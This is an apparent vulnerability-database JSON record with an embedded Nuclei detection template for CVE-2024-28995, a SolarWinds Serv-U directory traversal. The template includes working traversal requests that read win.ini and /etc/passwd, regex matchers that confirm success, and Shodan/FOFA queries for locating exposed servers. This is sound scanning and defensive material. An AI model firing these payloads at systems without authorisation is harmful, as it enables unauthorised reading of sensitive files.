{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-28995/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-28995/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-28995/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-28995/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-28995/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-28995"},"sightings":{"href":"/api/v1/sightings/cve-2024-28995"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-28995.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2024-28995\n\ninfo:\n  name: SolarWinds Serv-U - Directory Traversal\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.\n  impact: |\n    Attackers can traverse directories and access sensitive files outside the intended directory structure.\n  remediation: |\n    Update SolarWinds Serv-U to a version that patches the directory traversal vulnerability.\n  reference:\n    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-28995\n    - https://x.com/stephenfewer/status/1801191416741130575\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-28995\n    cwe-id: CWE-22\n    epss-score: 0.99614\n    epss-percentile: 0.99948\n    cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: solarwinds\n    product: serv-u\n    shodan-query: html:\"Serv-U\"\n    fofa-query: server=\"Serv-U\"\n  tags: cve,cve2024,lfi,solarwinds,serv-u,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n          - \"\\\\[(font|extension|file)s\\\\]\"\n        condition: or\n\n      - type: dsl\n        dsl:\n          - 'contains(header, \"Serv-U\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100e557e101f710b6b2bd3cc7dcf86055d6c68f49397ba229035f3efe0738b0e87602210089da3d6d22109f54dc8f8fe1d427a72f7d0420d3de5cc62754d107fc672c73dc:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2024-28995"}